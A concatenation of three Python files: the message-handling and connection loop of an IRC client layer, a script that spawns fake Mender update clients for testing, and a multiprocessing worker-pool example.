def func_on_kill_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
return (in_ret, in_init, self.CONST.irc_default_wait)
def func_on_quit_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
(irc_nick, irc_mask) = self.irc_extract_nick_mask_(in_string)
self.irc_track_delete_nick_(irc_nick)
return (in_ret, in_init, self.CONST.irc_default_wait)
def func_no_such_nick_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
irc_nick = self.irc_extract_single_(in_string)
self.irc_track_delete_nick_(irc_nick)
return (in_ret, in_init, self.CONST.irc_default_wait)
def func_on_nick_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
(irc_nick, irc_mask) = self.irc_extract_nick_mask_(in_string)
if irc_nick == self.irc_nick_base:
self.irc_check_and_restore_nick_()
my_split = in_string.split(':', 3)
if len(my_split) > 2:
new_nick = my_split[2]
if self.is_irc_nick_(new_nick):
new_mask = new_nick + irc_mask[len(irc_nick):]
        # check whether the new mask (with the new nick) belongs to a
        # registered user and, if necessary, grant that user rights
my_vuid = self.irc_get_vuid_by_mask_(new_mask, self.irc_channel)
self.irc_umode_by_nick_mask_(new_nick, new_mask, my_vuid)
return (in_ret, in_init, self.CONST.irc_default_wait)
def func_fast_nick_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
my_seconds = 0
if self.CONST.irc_default_draft == "ircu":
# Calculating from code 438 comments, not by RFC 1459
my_split = in_string.split(' ')
if len(my_split) > 11:
if my_split[-3] == 'wait' and my_split[-1] == 'seconds.':
try:
my_seconds = int(my_split[-2])
except:
pass
if my_seconds > 0 \
and my_seconds < self.CONST.irc_default_nick_pause * 2:
        self.__nick_pause = my_seconds # tries != seconds, but ...
else:
self.__nick_pause = self.CONST.irc_default_nick_pause
return (in_ret, 3, self.CONST.irc_default_wait)
#
# End of func_fast_nick_()
def func_chan_nicks_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
try:
my_array = in_string.split(":")
if my_array[0] == "":
my_array = my_array[2].split(" ")
for my_nick in my_array:
if my_nick[0] == '@':
my_nick = my_nick[1:]
self.irc_track_add_nick_(my_nick, None, None, None)
except:
return (in_ret, in_init, in_wait)
return (in_ret, in_init, self.CONST.irc_default_wait)
#
# End of func_chan_nicks_()
def func_end_nicks_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
try:
my_array = in_string.split(" ")
in_ret = self.irc_who_channel_(my_array[3])
except:
return (in_ret, in_init, in_wait)
return (in_ret, in_init, self.CONST.irc_default_wait)
def func_who_user_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
    # A check of self.__whox will be added here
try:
my_array = in_string.split(":")
if my_array[0] == "":
my_info = my_array[2][2:]
my_array = my_array[1].split(" ")
my_nick = my_array[7]
my_user = my_array[4]
my_host = my_array[5]
my_mask = my_nick + "!" + my_user + "@" + my_host
my_vuid = self.irc_get_vuid_by_mask_(my_mask, self.irc_channel)
self.irc_track_update_nick_(my_nick, my_mask, my_vuid, my_info)
except:
return (in_ret, in_init, in_wait)
return (in_ret, in_init, self.CONST.irc_default_wait)
#
# End of func_who_user_()
def func_whois_user_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
try:
my_array = in_string.split(":")
if my_array[0] == "":
my_info = my_array[2]
my_array = my_array[1].split(" ")
my_nick = my_array[3]
my_user = my_array[4]
my_host = my_array[5]
my_mask = my_nick + "!" + my_user + "@" + my_host
my_vuid = self.irc_get_vuid_by_mask_(my_mask, self.irc_channel)
self.irc_track_update_nick_(my_nick, my_mask, my_vuid, my_info)
except:
return (in_ret, in_init, in_wait)
return (in_ret, in_init, self.CONST.irc_default_wait - 1)
#
# End of func_whois_user_()
def func_on_join_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
(irc_nick, irc_mask) = self.irc_extract_nick_mask_(in_string)
my_vuid = self.irc_get_vuid_by_mask_(irc_mask, self.irc_channel)
self.irc_umode_by_nick_mask_(irc_nick, irc_mask, my_vuid)
self.irc_track_add_nick_(irc_nick, irc_mask, my_vuid, None)
return (in_ret, in_init, self.CONST.irc_default_wait)
def func_on_part_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
(irc_nick, irc_mask) = self.irc_extract_nick_mask_(in_string)
self.irc_track_delete_nick_(irc_nick)
if irc_nick == self.irc_nick_base:
self.irc_check_and_restore_nick_()
return (in_ret, in_init, self.CONST.irc_default_wait)
def func_on_mode_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
(irc_nick, irc_mask) = self.irc_extract_nick_mask_(in_string)
try:
my_array = in_string.split(" ")
if len(my_array) < 5:
return (in_ret, in_init, in_wait)
if my_array[1] != self.CONST.cmd_MODE:
return (in_ret, in_init, in_wait)
my_channel = my_array[2]
if not self.is_irc_channel_(my_channel):
return (in_ret, in_init, in_wait)
my_mode_string = my_array[3]
if len(my_mode_string) < 2:
return (in_ret, in_init, in_wait)
for my_char in my_mode_string:
if my_char not in self.CONST.irc_all_modes_chars:
return (in_ret, in_init, in_wait)
my_change = self.CONST.irc_mode_add
my_index = 0
my_nick = False
my_unban = None
for my_char in my_mode_string:
if my_char in self.CONST.irc_change_modes:
my_change = my_char
elif my_char in self.CONST.irc_user_modes:
my_mask = my_array[my_index + 4]
self.to_log_( \
"mode change '{}','{}' for '{}' on '{}'".format( \
my_change, my_char, my_mask, my_channel))
if my_change == self.CONST.irc_mode_del \
and my_char == self.CONST.irc_umode_op:
my_vuid = self.irc_get_vuid_by_mask_(irc_mask, \
self.irc_channel)
self.irc_umode_by_nick_mask_(my_mask, irc_mask, \
my_vuid)
if my_change == self.CONST.irc_mode_add \
and my_char == self.CONST.irc_umode_ban:
my_mask_array = my_mask.split("!")
my_pseudo = self.__irc_nick + '!'
my_pseudo += my_mask_array[1]
if self.irc_check_mask_(my_pseudo, my_mask):
my_nick = True
for my_item in self.irc_nicks:
(n_nick, n_mask, n_vuid, n_info) = my_item
if n_vuid[0] == self.CONST.api_vuid_cfg:
if self.irc_check_mask_(n_mask, my_mask):
my_unban = n_vuid
break
if not my_unban:
for my_num in range(len(self.irc_users)):
u_mask = self.irc_cfg_get_user_mask_(my_num)
if isinstance(u_mask, str):
u_mask = u_mask.replace('*', '_')
if self.irc_check_mask_(u_mask, my_mask):
u_vuid = self.irc_cfg_get_vuid_(my_num)
if u_vuid != None:
my_unban = u_vuid
break
my_index += 1
elif my_char in self.CONST.irc_channel_modes:
self.to_log_( \
"mode change '{}','{}' for '{}'".format( \
my_change, my_char, my_channel))
elif my_char in self.CONST.irc_extra_modes:
my_extra = my_array[my_index + 4]
self.to_log_( \
"mode change '{}','{}' extra '{}' for '{}'".format( \
my_change, my_char, my_extra, my_channel))
my_index += 1
if my_unban != None:
my_user = self.irc_cfg_get_user_struct_by_vuid_(my_unban)
if my_user != None:
my_opts = self.irc_get_useropts_from_user_struct_(my_user)
if self.CONST.irc_unban in my_opts:
in_ret = self.irc_send_("{} {} {}{} {}\r\n".format( \
self.CONST.cmd_MODE, my_channel, \
self.CONST.irc_mode_del, \
self.CONST.irc_umode_ban, my_mask))
if my_nick:
self.irc_random_nick_(self.__irc_nick, True)
if my_nick or my_unban:
return (in_ret, in_init, 0)
except:
return (in_ret, in_init, in_wait)
return (in_ret, in_init, self.CONST.irc_default_wait)
#
# End of func_on_mode_()
def func_on_error_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
    if "Closing " in in_string or "imeout" in in_string:
return (-1, 0, in_wait)
return (in_ret, 1, self.CONST.irc_default_wait)
# SERVICE Hooks:
def func_on_srv_info_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
return (in_ret, in_init, in_wait)
def init_rfc1459_(self):
#
C = self.CONST
#
self.irc_codes = [
(C.ERR_NICKNAMEINUSE, "ERR_NICKNAMEINUSE", self.func_nick_in_use_),
(C.ERR_NOTREGISTERED, "ERR_NOTREGISTERED", self.func_not_reg_),
(C.ERR_BANNEDFROMCHAN, "ERR_BANNEDFROMCHAN", self.func_banned_),
(C.ERR_NICKCHANGETOOFAST,"ERR_NICKCHANGETOOFAST",self.func_fast_nick_),
(C.RPL_NAMREPLY, "RPL_NAMREPLY", self.func_chan_nicks_),
(C.RPL_ISUPPORT, "RPL_ISUPPORT", self.func_featurelist_),
(C.RPL_WHOISUSER, "RPL_WHOISUSER", self.func_whois_user_),
(C.RPL_ENDOFNAMES, "RPL_ENDOFNAMES", self.func_end_nicks_),
(C.RPL_WHOREPLY, "RPL_WHOREPLY", self.func_who_user_),
(C.ERR_NOSUCHNICK, "ERR_NOSUCHNICK", self.func_no_such_nick_),
(C.ERR_CHANNELISFULL, "ERR_CHANNELISFULL", self.func_banned_),
(C.ERR_BADCHANNELKEY, "ERR_BADCHANNELKEY", self.func_banned_),
(C.ERR_ERRONEUSNICKNAME, "ERR_ERRONEUSNICKNAME", self.func_nick_in_use_),
(C.ERR_NOSUCHCHANNEL, "ERR_NOSUCHCHANNEL", self.func_banned_),
(C.ERR_NICKCOLLISION, "ERR_NICKCOLLISION", self.func_nick_in_use_),
(C.ERR_ALREADYREGISTERED,"ERR_ALREADYREGISTERED",self.func_registered_),
(C.RPL_WELCOME, "RPL_WELCOME", None),
(C.RPL_CREATED, "RPL_CREATED", None),
(C.RPL_MYINFO, "RPL_MYINFO", None),
(C.RPL_LUSERCHANNELS, "RPL_LUSERCHANNELS", None),
(C.RPL_LUSERME, "RPL_LUSERME", None),
(C.ERR_NOSUCHSERVER, "ERR_NOSUCHSERVER", None),
(C.ERR_CANNOTSENDTOCHAN, "ERR_CANNOTSENDTOCHAN", None),
(C.ERR_TOOMANYCHANNELS, "ERR_TOOMANYCHANNELS", None),
(C.ERR_WASNOSUCHNICK, "ERR_WASNOSUCHNICK", None),
(C.ERR_TARGETTOOFAST, "ERR_TARGETTOOFAST", None),
(C.ERR_TOOMANYTARGETS, "ERR_TOOMANYTARGETS", None),
(C.ERR_NOORIGIN, "ERR_NOORIGIN", None),
(C.ERR_NORECIPIENT, "ERR_NORECIPIENT", None),
(C.ERR_NOTEXTTOSEND, "ERR_NOTEXTTOSEND", None),
      (C.ERR_NOTOPLEVEL,      "ERR_NOTOPLEVEL", None),
(C.ERR_WILDTOPLEVEL, "ERR_WILDTOPLEVEL", None),
(C.ERR_UNKNOWNCOMMAND, "ERR_UNKNOWNCOMMAND", None),
(C.ERR_NOMOTD, "ERR_NOMOTD", None),
(C.ERR_NOADMININFO, "ERR_NOADMININFO", None),
(C.ERR_FILEERROR, "ERR_FILEERROR", None),
(C.ERR_NONICKNAMEGIVEN, "ERR_NONICKNAMEGIVEN", None),
(C.ERR_USERNOTINCHANNEL, "ERR_USERNOTINCHANNEL", None),
(C.ERR_NOTONCHANNEL, "ERR_NOTONCHANNEL", None),
(C.ERR_NOLOGIN, "ERR_NOLOGIN", None),
(C.ERR_SUMMONDISABLED, "ERR_SUMMONDISABLED", None),
(C.ERR_USERSDISABLED, "ERR_USERSDISABLED", None),
(C.ERR_NEEDMOREPARAMS, "ERR_NEEDMOREPARAMS", None),
(C.ERR_USERSDONTMATCH, "ERR_USERSDONTMATCH", None),
(C.ERR_PASSWDMISMATCH, "ERR_PASSWDMISMATCH", None),
(C.ERR_YOUREBANNEDCREEP, "ERR_YOUREBANNEDCREEP", None),
(C.ERR_YOUWILLBEBANNED, "ERR_YOUWILLBEBANNED", None),
(C.ERR_KEYSET, "ERR_KEYSET", None),
(C.ERR_UNKNOWNMODE, "ERR_UNKNOWNMODE", None),
(C.ERR_INVITEONLYCHAN, "ERR_INVITEONLYCHAN", None),
(C.ERR_BADCHANNELMASK, "ERR_BADCHANNELMASK", None),
(C.ERR_BANLISTFULL, "ERR_BANLISTFULL", None),
(C.ERR_NOPRIVILEGES, "ERR_NOPRIVILEGES", None),
(C.ERR_CANTKILLSERVER, "ERR_CANTKILLSERVER", None),
(C.ERR_UNIQOPPRIVSNEEDED,"ERR_UNIQOPPRIVSNEEDED",None),
(C.ERR_NOOPERHOST, "ERR_NOOPERHOST", None),
(C.ERR_NOSERVICEHOST, "ERR_NOSERVICEHOST", None),
(C.ERR_UMODEUNKNOWNFLAG, "ERR_UMODEUNKNOWNFLAG", None) ]
if self.CONST.irc_default_draft == "PyIRCIoT":
self.irc_codes.extend( [
(C.RPL_JSON, "RPL_JSON", None) ] )
elif self.CONST.irc_default_draft == "ircu":
self.irc_codes.extend( [
(C.ERR_BADPING, "ERR_BADPING", self.func_bad_ping_),
(C.ERR_BANNICKCHANGE, "ERR_BANNICKCHANGE", self.func_restore_nick_),
(C.RPL_USERIP, "RPL_USERIP", None),
(C.ERR_INVALIDUSERNAME,"ERR_INVALIDUSERNAME", None) ] )
elif self.CONST.irc_default_draft == "Unreal":
self.irc_codes.extend( [
(C.ERR_NONICKCHANGE, "ERR_NONICKCHANGE", self.func_restore_nick_),
(C.RPL_WHOISBOT, "RPL_WHOISBOT", None),
(C.RPL_USERIP, "RPL_USERIP", None),
       (C.RPL_REDIR,          "RPL_REDIR", None),
(C.ERR_NOSUCHSERVICE, "ERR_NOSUCHSERVICE", None),
(C.ERR_NOINVITE, "ERR_NOINVITE", None),
(C.RPL_COMMANDSYNTAX, "RPL_COMMANDSYNTAX", None),
(C.RPL_STARTLS, "RPL_STARTLS", None),
(C.RPL_DCCSTATUS, "RPL_DCCSTATUS", None),
(C.RPL_TEXT, "RPL_TEXT", None) ] )
elif self.CONST.irc_default_draft == "Bahamut":
self.irc_codes.extend( [
(C.RPL_USIGNSSL, "RPL_USIGNSSL", None),
(C.ERR_NEEDREGGEDNICK, "ERR_NEEDREGGEDNICK", None),
(C.RPL_STATSCLONE, "RPL_STATSCLONE", None),
(C.RPL_TEXT, "RPL_TEXT", None) ] )
elif self.CONST.irc_default_draft == "Insp":
self.irc_codes.extend( [
(C.RPL_AUTOOPLIST, "RPL_AUTOOPLIST", None),
(C.RPL_ENDOFAUTOOPLIST,"RPL_ENDOFAUTOOPLIST", None),
(C.ERR_WORDFILTERED, "ERR_WORDFILTERED", None) ] )
elif self.CONST.irc_default_draft == "IRCNet":
self.irc_codes.extend( [
(C.ERR_NOCHANMODES, "ERR_NOCHANMODES", None),
(C.ERR_RESTRICTED, "ERR_RESTRICTED", None) ] )
else: # Unknown extending
pass
#
if self.__irc_layer_mode == self.CONST.irc_mode_CLIENT:
self.irc_commands = [
(C.cmd_INVITE, None),
(C.cmd_JOIN, self.func_on_join_),
(C.cmd_KICK, self.func_on_kick_),
(C.cmd_KILL, self.func_on_kill_),
(C.cmd_MODE, self.func_on_mode_),
(C.cmd_NICK, self.func_on_nick_),
(C.cmd_NOTICE, None),
(C.cmd_PART, self.func_on_part_),
(C.cmd_PONG, None),
(C.cmd_PRIVMSG, None),
(C.cmd_QUIT, self.func_on_quit_),
(C.cmd_ERROR, self.func_on_error_) ]
#
elif self.__irc_layer_mode == self.CONST.irc_mode_SERVER: # RFC 2813
      self.irc_commands = [
(C.cmd_PASS, None), (C.cmd_SERVER, None),
(C.cmd_NICK, None), (C.cmd_QUIT, None),
(C.cmd_SQUIT, None), (C.cmd_JOIN, None),
(C.cmd_NJOIN, None), (C.cmd_MODE, None),
(C.cmd_LINKS, None), (C.cmd_KILL, None),
(C.cmd_NAMES, None), (C.cmd_INVITE, None),
(C.cmd_STATS, None), (C.cmd_CONNECT, None),
(C.cmd_TRACE, None), (C.cmd_ADMIN, None),
(C.cmd_WHO, None), (C.cmd_INFO, self.func_on_srv_info_),
(C.cmd_WHOIS, None), (C.cmd_WHOWAS, None),
(C.cmd_AWAY, None), (C.cmd_RESTART, None),
(C.cmd_SUMMON, None), (C.cmd_USERS, None),
(C.cmd_WALLOPS, None), (C.cmd_USERHOST, None),
(C.cmd_TOPIC, None), (C.cmd_KICK, None),
(C.cmd_PONG, None), (C.cmd_PART, None),
(C.cmd_ERROR, None), (C.cmd_PRIVMSG, None),
(C.cmd_PUBMSG, None), (C.cmd_PUBNOTICE, None),
(C.cmd_NOTICE, None), (C.cmd_PRIVNOTICE, None),
(C.cmd_ISON, None), (C.cmd_REHASH, None) ]
#
self.irc_features = [
(C.feature_CASEMAPPING, C.featt_STRING, None),
(C.feature_CHANMODES, C.featt_FLAGS, None),
(C.feature_CHANTYPES, C.featt_FLAGS, None),
(C.feature_NICKLEN, C.featt_NUMBER, self.func_feature_nicklen_),
(C.feature_PREFIX, C.featt_FLAGS, None) ]
if self.CONST.irc_default_draft == "ircu":
self.irc_features.extend( [
(C.feature_AWAYLEN, C.featt_NUMBER, None),
(C.feature_CHANNELLEN, C.featt_NUMBER, None),
(C.feature_CNOTICE, C.featt_EMPTY, None),
(C.feature_CPRIVMSG, C.featt_EMPTY, None),
(C.feature_MAXCHANLEN, C.featt_NUMBER, None),
(C.feature_KICKLEN, C.featt_NUMBER, None),
(C.feature_MODES, C.featt_NUMBER, None),
(C.feature_MAXCHANS, C.featt_NUMBER, None),
(C.feature_MAXBNANS, C.featt_NUMBER, None),
(C.feature_MAXNICKLEN, C.featt_NUMBER, self.func_feature_nicklen_),
(C.feature_NETWORK, C.featt_STRING, self.func_feature_network_),
(C.feature_SILENCE, C.featt_NUMBER, None),
(C.feature_STATUSMSG, C.featt_FLAGS, None),
(C.feature_TOPICLEN, C.featt_NUMBER, self.func_feature_topiclen_),
(C.feature_USERIP, C.featt_EMPTY, None),
(C.feature_WALLCHOPS, C.featt_EMPTY, self.func_feature_wallchops_),
(C.feature_WALLVOICES, C.featt_EMPTY, None),
(C.feature_WHOX, C.featt_EMPTY, self.func_feature_whox_) ] )
#
# End of init_rfc1459_()
def irc_output_all_(self, in_messages_packs, in_wait = None):
if not isinstance(in_messages_packs, list):
return
if not isinstance(in_wait, int) and \
not isinstance(in_wait, float):
in_wait = self.CONST.irc_default_wait
for my_pack in in_messages_packs:
(my_messages, my_vuid) = my_pack
if isinstance(my_messages, str):
my_messages = [ my_messages ]
if isinstance(my_messages, list):
for my_message in my_messages:
self.irc_add_to_queue_( \
self.CONST.irc_queue_output, \
my_message, in_wait, my_vuid)
#
# End of irc_output_all_()
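  #
  # Hedged usage sketch (hypothetical message text, not from this code):
  # each pack passed to irc_output_all_() is a (messages, vuid) tuple,
  # where messages may be a single string or a list of strings, e.g.:
  #
  #   self.irc_output_all_([ ("test message", self.CONST.api_vuid_all) ], \
  #     self.CONST.irc_default_wait)
  #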
# incomplete
def irc_process_server_(self):
#
self.init_rfc1459_()
#
try:
pass
except:
pass
self.irc_run = False
#
# End of irc_process_server_()
def irc_process_client_(self):
#
self.init_rfc1459_()
#
irc_init = 0
irc_wait = self.CONST.irc_first_wait
irc_input_buffer = ""
irc_ret = 0
irc_vuid = "{:s}0".format(self.CONST.api_vuid_cfg)
self.__delta_time = 0
# app.run(host='0.0.0.0', port=50000, debug=True)
    # must be fixed to work for an unprivileged user
self.irc = self.irc_socket_(self.irc_server)
while (self.irc_run):
try:
if not self.irc:
if self.__join_retry == 0:
sleep(self.CONST.irc_first_wait)
self.irc = self.irc_socket_(self.irc_server)
irc_init = 0
if irc_init < 6:
irc_init += 1
if irc_init == 1:
# self.to_log_(self.errors[self.CONST.err_CONNTO] \
# + "'{}:{}'".format(self.irc_server_ip, self.irc_port))
            self.__irc_silence = 0
try:
self.irc_connect_(self.irc_server_ip, self.irc_port)
except socket.error:
self.irc_disconnect_()
self.irc = self.irc_socket_(self.irc_server)
irc_init = 0
elif irc_init == 2:
if self.__irc_password:
self.irc_send_(self.CONST.cmd_PASS \
+ " " + self.__irc_password)
if self.__join_retry > self.__join_retry_max:
self.irc_user = self.irc_random_user_()
            # A random username can work around a ban, but it also
            # breaks our own IRC mask, which must be restored later
else:
self.irc_user = self.irc_tolower_(self.__irc_nick)
if self.irc_send_(self.CONST.cmd_USER \
+ " " + self.irc_user \
+ " " + self.irc_host + " 1 :" \
+ self.irc_info) == -1:
irc_init = 0
elif irc_init == 3:
self.__join_retry = 0
if self.irc_send_(self.CONST.cmd_NICK \
+ " " + self.__irc_nick) == -1:
irc_init = 0
elif irc_init == 4:
if not self.is_irc_channel_(self.irc_channel): continue
irc_wait = self.CONST.irc_default_wait
self.__join_retry += 1
if self.irc_send_(self.CONST.cmd_JOIN \
+ " " + self.irc_channel + str(" " \
+ self.irc_chankey if self.irc_chankey else "")) == -1:
irc_init = 0
elif irc_init == 5:
if not self.is_irc_channel_(self.irc_channel): continue
irc_wait = self.CONST.irc_default_wait
self.__join_retry += 1
if self.irc_send_(self.CONST.cmd_JOIN \
+ " {}{}\r".format(self.irc_channel, str(" " \
+ self.irc_chankey if self.irc_chankey else ""))) == -1:
irc_init = 0
elif irc_init == 6:
self.ident_run = False
if irc_init > 0:
(irc_ret, irc_input_buffer, self.__delta_time) \
= self.irc_recv_(irc_wait)
else:
irc_ret = -1
irc_wait = self.CONST.irc_default_wait
if irc_init > 3 and self.__irc_silence >= self.irc_silence_max \
and self.is_irc_channel_(self.irc_channel):
if self.__irc_silence == self.irc_silence_max:
          # Take some action to provoke TCP traffic on an otherwise silent link
if self.irc_who_channel_(self.irc_channel) == -1:
irc_init = 0
else:
self.irc_check_and_restore_nick_()
elif self.__irc_silence > self.irc_silence_max:
irc_init = 0
if irc_init == 0:
irc_ret = -1
self.__irc_silence += 1
if self.__delta_time > 0:
irc_wait = self.__delta_time
else:
if irc_init == 6:
self.irc_track_clarify_nicks_()
if irc_ret == -1:
self.irc_reconnect_()
irc_init = 0
continue
for irc_input_split in re.split(r'[\r\n]', irc_input_buffer):
if irc_input_split == "":
            irc_input_buffer = ""
continue
self.__irc_silence = 0
if irc_input_split[:5] == self.CONST.cmd_PING + " ":
self.__delta_ping \
= self.td2ms_(self.time_now - self.__time_ping)
self.__time_ping = self.time_now
if self.irc_pong_(irc_input_split) == -1:
self.irc_reconnect_()
irc_init = 0
break
else:
self.irc_track_clarify_nicks_()
try:
irc_input_cmd = irc_input_split.split(' ')[1]
except:
irc_input_cmd = ""
if irc_input_split[0] == ':':
for irc_cod_pack in self.irc_codes:
(irc_code, code_name, irc_function) = irc_cod_pack
if irc_function != None:
if irc_input_cmd == irc_code:
irc_args = (irc_input_split, \
irc_ret, irc_init, irc_wait)
(irc_ret, irc_init, irc_wait) = irc_function(irc_args)
for irc_cmd_pack in self.irc_commands:
(irc_cmd, irc_function) = irc_cmd_pack
if irc_function != None:
if irc_input_cmd == irc_cmd:
irc_args = (irc_input_split, irc_ret, irc_init, irc_wait)
(irc_ret, irc_init, irc_wait) = irc_function(irc_args)
if irc_input_cmd == self.CONST.cmd_PRIVMSG \
or irc_input_split == "":
irc_nick = ""
irc_mask = "!@"
irc_vuid = None
irc_message = None
if irc_input_split != "":
(irc_nick, irc_mask) \
= self.irc_extract_nick_mask_(irc_input_split)
self.irc_track_fast_nick_(irc_nick, irc_mask)
self.time_now = datetime.datetime.now()
irc_message = self.irc_extract_message_(irc_input_split)
if irc_message == None and irc_input_buffer == "":
self.time_now = datetime.datetime.now()
irc_message = ""
if irc_message != None:
irc_vuid = self.irc_get_vuid_by_mask_(irc_mask, self.irc_channel)
if irc_vuid != None and irc_init > 3 \
and self.is_json_(irc_message):
if self.irc_talk_with_strangers:
self.irc_track_update_anons_by_vuid_(irc_vuid, \
irc_mask, self.irc_channel, \
None, None, None, None, None, None, None)
self.irc_add_to_queue_(self.CONST.irc_queue_input, \
irc_message, self.CONST.irc_default_wait, irc_vuid)
irc_input_split = ""
          irc_input_buffer = ""
if irc_init > 5:
(irc_message, irc_wait, irc_vuid) \
= self.irc_check_queue_(self.CONST.irc_queue_output)
irc_message = str(irc_message)
if irc_message != "":
my_private = False
if irc_vuid != self.CONST.api_vuid_all:
my_nick = self.irc_track_get_nick_by_vuid_(irc_vuid)
if self.is_irc_nick_(my_nick):
my_private = True
if my_private:
self.irc_send_(self.CONST.cmd_PRIVMSG + " " \
+ my_nick + " :" + irc_message)
else:
self.irc_send_(self.CONST.cmd_PRIVMSG + " " \
+ self.irc_channel + " :" + irc_message)
irc_message = ""
if self.td2ms_(self.time_now - self.__time_ping) \
> self.__delta_ping * 2 and self.__delta_ping > 0:
if self.irc_who_channel_(self.irc_channel) == -1:
self.irc_reconnect_()
irc_init = 0
else:
self.irc_check_and_restore_nick_()
self.__delta_ping = 0
except socket.error:
      self.irc_disconnect_()
self.irc = None
#
# End of irc_process_client_()
|
client.py
|
# The MIT License (MIT)
#
# Copyright (c) 2016 Gregorio Di Stefano
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import time
import threading
import random
import tempfile
import copy
from mender.cli import device
from mender.client import ClientNotAuthorizedError
def add_args(sub):
sub.set_defaults(clientcommand='')
sub.add_argument('-n', '--number', help="Number of clients", type=int, required=True)
sub.add_argument('-i', '--inventory', help="Inventory items", action='append', default=["device_type:fake-device", "image_type:fake-image"])
sub.add_argument('--inventory-update-freq', type=int, default=60)
sub.add_argument('-w', '--wait', help="Maximum wait before changing update steps", type=int, default=30)
    sub.add_argument('-f', '--fail', help="Fail update with specific message", type=str, default="")
sub.add_argument('-c', '--updates', help="Number of updates to perform before exiting", type=int, default=1)
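# Hedged example (the command and subcommand names below are assumptions,
# not taken from this file): once add_args() has populated a subparser, an
# invocation along the lines of
#   mender-cli client -n 5 -w 30 -c 1 -i device_type:fake-device
# would start 5 fake clients, each performing a single update.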
def do_main(opts):
threads = []
client_options = []
for _ in range(opts.number):
new_opts = copy.deepcopy(opts)
new_opts.store = True
new_opts.verify = False
new_opts.attrs_set = opts.inventory
new_opts.mac_address = ":".join(["%02x" % random.randint(0x00, 0xFF) for i in range(6)])
new_opts.device_key = tempfile.NamedTemporaryFile().name
new_opts.tenant_token = tempfile.NamedTemporaryFile().name
new_opts.device_token = tempfile.NamedTemporaryFile().name
threads.append(threading.Thread(target=run_client, args=(new_opts,)))
for t in threads:
t.start()
class InventoryReporter:
def __init__(self, opts):
self.thread = threading.Thread(target=self.send_inventory_data)
self.stop_event = threading.Event()
self.opts = opts
def start(self):
self.thread.start()
def stop(self):
self.stop_event.set()
self.thread.join()
def send_inventory_data(self):
while not self.stop_event.wait(self.opts.inventory_update_freq):
logging.info('inventory report')
device.do_inventory(self.opts)
def run_client(opts):
logging.info("starting client with MAC: %s", opts.mac_address)
need_auth = True
update_cnt = 0
while True:
if need_auth:
block_until_authorized(opts)
need_auth = False
inv = InventoryReporter(opts)
inv.start()
while True:
try:
block_until_update(opts)
update_cnt += 1
if opts.updates and update_cnt >= opts.updates:
break
except ClientNotAuthorizedError:
logging.info('client authorization expired')
need_auth = True
break
logging.info('waiting for inventory reporter')
inv.stop()
def block_until_authorized(opts):
logging.info("performing bootstrap")
device.do_key(opts)
while True:
if device.do_authorize(opts):
logging.info("successfully bootstrapped client")
return
else:
logging.info("device not authorized yet..")
time.sleep(5)
def block_until_update(opts):
return device.do_fake_update(opts)
|
subclassing_and_waiting.py
|
#
# Simple example which uses a pool of workers to carry out some tasks.
#
# Notice that the results will probably not come out of the output
# queue in the same order as the corresponding tasks were
# put on the input queue. If it is important to get the results back
# in the original order then consider using `Pool.map()` or
# `Pool.imap()` (which will save on the amount of code needed anyway).
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
import time
import random
from multiprocessing import Process, Queue, current_process, freeze_support
#
# Function run by worker processes
#
def worker(input, output):
for func, args in iter(input.get, 'STOP'):
result = calculate(func, args)
output.put(result)
#
# Function used to calculate result
#
def calculate(func, args):
result = func(*args)
return '%s says that %s%s = %s' % \
(current_process().name, func.__name__, args, result)
#
# Functions referenced by tasks
#
def mul(a, b):
time.sleep(0.5*random.random())
return a * b
def plus(a, b):
time.sleep(0.5*random.random())
return a + b
#
#
#
def test():
NUMBER_OF_PROCESSES = 4
TASKS1 = [(mul, (i, 7)) for i in range(20)]
TASKS2 = [(plus, (i, 8)) for i in range(10)]
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for task in TASKS1:
task_queue.put(task)
# Start worker processes
for i in range(NUMBER_OF_PROCESSES):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
print('Unordered results:')
for i in range(len(TASKS1)):
print('\t', done_queue.get())
    time.sleep(5)
    if task_queue.empty():
        print("Task queue is empty")
# Add more tasks using `put()`
for task in TASKS2:
task_queue.put(task)
# Get and print some more results
for i in range(len(TASKS2)):
print('\t', done_queue.get())
# Tell child processes to stop
for i in range(NUMBER_OF_PROCESSES):
task_queue.put('STOP')
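#
# Hedged alternative sketch (not part of the original example): as the header
# comment notes, a process pool can return results in the original task order.
# The function below is illustrative only and is never called by default; it
# reuses calculate() and the TASKS1-style (func, args) pairs defined above.
#
def pool_map_example():
    from multiprocessing import Pool
    tasks = [(mul, (i, 7)) for i in range(20)]
    with Pool(processes=4) as pool:
        # starmap() unpacks each (func, args) pair into calculate(func, args)
        # and returns the results in the same order as the inputs
        ordered_results = pool.starmap(calculate, tasks)
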